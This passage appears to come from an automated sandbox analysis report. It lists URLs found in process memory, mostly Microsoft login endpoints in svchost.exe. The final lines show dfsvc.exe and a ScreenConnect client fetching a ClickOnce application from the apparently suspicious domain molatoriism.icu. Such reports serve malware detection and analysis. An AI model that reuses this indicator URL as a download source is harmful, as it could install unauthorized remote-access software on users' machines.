                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 00000008.00000003.1364648785.000002001D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000008.00000003.1364648785.000002001D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf524
                  Source: svchost.exe, 00000008.00000002.2595421751.000002001DE1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000008.00000003.1364469812.000002001D927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364469812.000002001D927000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000008.00000003.1364469812.000002001D927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D92C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srfssuer
                  Source: svchost.exe, 00000008.00000003.1364648785.000002001D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 00000008.00000003.1364433018.000002001D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 00000008.00000003.1364059093.000002001D92C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 00000008.00000003.1364648785.000002001D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806011
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806034
                  Source: svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364350500.000002001D957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364165885.000002001D95A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000008.00000002.2594952683.000002001D0D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
                  Source: svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
                  Source: svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000008.00000003.1364469812.000002001D927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
                  Source: svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E350000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1766714940.0000000000F2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2246395181.000001676A541000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2245764625.00000167687C7000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2244765941.00000167686C4000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768380030.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768380030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1766714940.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769018130.000000001B56A000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768380030.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1767483141.0000000001005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768380030.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1766714940.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769216227.000000001B610000.00000004.00000020.00020000.00000000.sdmp, AI54ZOIT.log.1.drString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application01b
